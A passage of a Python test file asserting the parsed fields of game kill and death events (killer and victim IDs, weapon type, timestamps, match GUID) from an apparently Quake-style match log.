assert e[34]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[34]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[34]['DATA']['KILLER']['NAME'] is None # noqa
assert e[34]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[34]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[34]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[34]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[34]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[34]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[34]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[34]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[34]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[34]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[34]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[34]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[34]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[34]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[34]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[34]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[34]['DATA']['ROUND'] is None # noqa
assert e[34]['DATA']['SUICIDE'] is None # noqa
assert e[34]['DATA']['TEAMKILL'] is None # noqa
assert e[34]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[34]['DATA']['TEAM_DEAD'] is None # noqa
assert e[34]['DATA']['TIME'] == 114.9 # noqa
assert e[34]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[34]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[34]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[34]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[34]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[34]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[34]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[34]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[34]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[34]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[34]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[34]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[34]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[34]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[34]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[34]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[34]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[34]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[34]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[34]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[34]['DATA']['WARMUP'] == False # noqa
assert e[34]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[35]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[35]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[35]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[35]['DATA']['KILLER']['BOT'] is None # noqa
assert e[35]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[35]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[35]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[35]['DATA']['KILLER']['NAME'] is None # noqa
assert e[35]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[35]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[35]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[35]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[35]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[35]['DATA']['KILLER']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[35]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[35]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[35]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[35]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[35]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[35]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[35]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[35]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[35]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[35]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[35]['DATA']['ROUND'] is None # noqa
assert e[35]['DATA']['SUICIDE'] is None # noqa
assert e[35]['DATA']['TEAMKILL'] is None # noqa
assert e[35]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[35]['DATA']['TEAM_DEAD'] is None # noqa
assert e[35]['DATA']['TIME'] == 114.9 # noqa
assert e[35]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[35]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[35]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[35]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[35]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[35]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[35]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[35]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[35]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[35]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[35]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[35]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[35]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[35]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[35]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[35]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[35]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[35]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[35]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[35]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[35]['DATA']['WARMUP'] == False # noqa
assert e[35]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[36]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[36]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[36]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[36]['DATA']['KILLER']['BOT'] is None # noqa
assert e[36]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[36]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[36]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[36]['DATA']['KILLER']['NAME'] is None # noqa
assert e[36]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[36]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[36]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[36]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[36]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[36]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[36]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[36]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[36]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[36]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[36]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[36]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[36]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[36]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[36]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[36]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[36]['DATA']['ROUND'] is None # noqa
assert e[36]['DATA']['SUICIDE'] is None # noqa
assert e[36]['DATA']['TEAMKILL'] is None # noqa
assert e[36]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[36]['DATA']['TEAM_DEAD'] is None # noqa
assert e[36]['DATA']['TIME'] == 122.2 # noqa
assert e[36]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[36]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[36]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[36]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[36]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[36]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[36]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[36]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[36]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[36]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[36]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[36]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[36]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[36]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[36]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[36]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[36]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[36]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[36]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[36]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[36]['DATA']['WARMUP'] == False # noqa
assert e[36]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[37]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[37]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[37]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[37]['DATA']['KILLER']['BOT'] is None # noqa
assert e[37]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[37]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[37]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[37]['DATA']['KILLER']['NAME'] is None # noqa
assert e[37]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[37]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[37]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[37]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[37]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[37]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[37]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[37]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[37]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[37]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[37]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[37]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[37]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[37]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[37]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[37]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[37]['DATA']['ROUND'] is None # noqa
assert e[37]['DATA']['SUICIDE'] is None # noqa
assert e[37]['DATA']['TEAMKILL'] is None # noqa
assert e[37]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[37]['DATA']['TEAM_DEAD'] is None # noqa
assert e[37]['DATA']['TIME'] == 122.2 # noqa
assert e[37]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[37]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[37]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[37]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[37]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[37]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[37]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[37]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[37]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[37]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[37]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[37]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[37]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[37]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[37]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[37]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[37]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[37]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[37]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[37]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[37]['DATA']['WARMUP'] == False # noqa
assert e[37]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[38]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[38]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[38]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[38]['DATA']['KILLER']['BOT'] is None # noqa
assert e[38]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[38]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[38]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[38]['DATA']['KILLER']['NAME'] is None # noqa
assert e[38]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[38]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[38]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[38]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[38]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[38]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[38]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[38]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[38]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[38]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[38]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[38]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[38]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[38]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[38]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[38]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[38]['DATA']['ROUND'] is None # noqa
assert e[38]['DATA']['SUICIDE'] is None # noqa
assert e[38]['DATA']['TEAMKILL'] is None # noqa
assert e[38]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[38]['DATA']['TEAM_DEAD'] is None # noqa
assert e[38]['DATA']['TIME'] == 130.8 # noqa
assert e[38]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[38]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[38]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[38]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[38]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[38]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[38]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[38]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[38]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[38]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[38]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[38]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[38]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[38]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[38]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[38]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[38]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[38]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[38]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[38]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[38]['DATA']['WARMUP'] == False # noqa
assert e[38]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[39]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[39]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[39]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[39]['DATA']['KILLER']['BOT'] is None # noqa
assert e[39]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[39]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[39]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[39]['DATA']['KILLER']['NAME'] is None # noqa
assert e[39]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[39]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[39]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[39]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[39]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[39]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[39]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[39]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[39]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[39]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[39]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[39]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[39]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[39]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[39]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[39]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[39]['DATA']['ROUND'] is None # noqa
assert e[39]['DATA']['SUICIDE'] is None # noqa
assert e[39]['DATA']['TEAMKILL'] is None # noqa
assert e[39]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[39]['DATA']['TEAM_DEAD'] is None # noqa
assert e[39]['DATA']['TIME'] == 130.8 # noqa
assert e[39]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[39]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[39]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[39]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[39]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[39]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[39]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[39]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[39]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[39]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[39]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[39]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[39]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[39]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[39]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[39]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[39]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[39]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[39]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[39]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[39]['DATA']['WARMUP'] == False # noqa
assert e[39]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[40]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[40]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[40]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[40]['DATA']['KILLER']['BOT'] is None # noqa
assert e[40]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[40]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[40]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[40]['DATA']['KILLER']['NAME'] is None # noqa
assert e[40]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[40]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[40]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[40]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[40]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[40]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[40]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[40]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[40]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[40]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[40]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[40]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[40]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[40]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[40]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[40]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[40]['DATA']['ROUND'] is None # noqa
assert e[40]['DATA']['SUICIDE'] is None # noqa
assert e[40]['DATA']['TEAMKILL'] is None # noqa
assert e[40]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[40]['DATA']['TEAM_DEAD'] is None # noqa
assert e[40]['DATA']['TIME'] == 135.4 # noqa
assert e[40]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[40]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[40]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[40]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[40]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[40]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[40]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[40]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[40]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[40]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[40]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[40]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[40]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[40]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[40]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[40]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[40]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[40]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[40]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[40]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[40]['DATA']['WARMUP'] == False # noqa
assert e[40]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[41]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[41]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[41]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[41]['DATA']['KILLER']['BOT'] is None # noqa
assert e[41]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[41]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[41]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[41]['DATA']['KILLER']['NAME'] is None # noqa
assert e[41]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[41]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[41]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[41]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[41]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[41]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[41]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[41]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[41]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[41]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[41]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[41]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[41]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[41]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[41]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[41]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[41]['DATA']['ROUND'] is None # noqa
assert e[41]['DATA']['SUICIDE'] is None # noqa
assert e[41]['DATA']['TEAMKILL'] is None # noqa
assert e[41]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[41]['DATA']['TEAM_DEAD'] is None # noqa
assert e[41]['DATA']['TIME'] == 135.4 # noqa
assert e[41]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[41]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[41]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[41]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[41]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[41]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[41]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[41]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[41]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[41]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[41]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[41]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[41]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[41]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[41]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[41]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[41]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[41]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[41]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[41]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[41]['DATA']['WARMUP'] == False # noqa
assert e[41]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[42]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[42]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[42]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[42]['DATA']['KILLER']['BOT'] is None # noqa
assert e[42]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[42]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[42]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[42]['DATA']['KILLER']['NAME'] is None # noqa
assert e[42]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[42]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[42]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[42]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[42]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[42]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[42]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[42]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[42]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[42]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[42]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[42]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[42]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[42]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[42]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[42]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[42]['DATA']['ROUND'] is None # noqa
assert e[42]['DATA']['SUICIDE'] is None # noqa
assert e[42]['DATA']['TEAMKILL'] is None # noqa
assert e[42]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[42]['DATA']['TEAM_DEAD'] is None # noqa
assert e[42]['DATA']['TIME'] == 138.4 # noqa
assert e[42]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[42]['DATA']['VICTIM']['AMMO'] is None # noqa
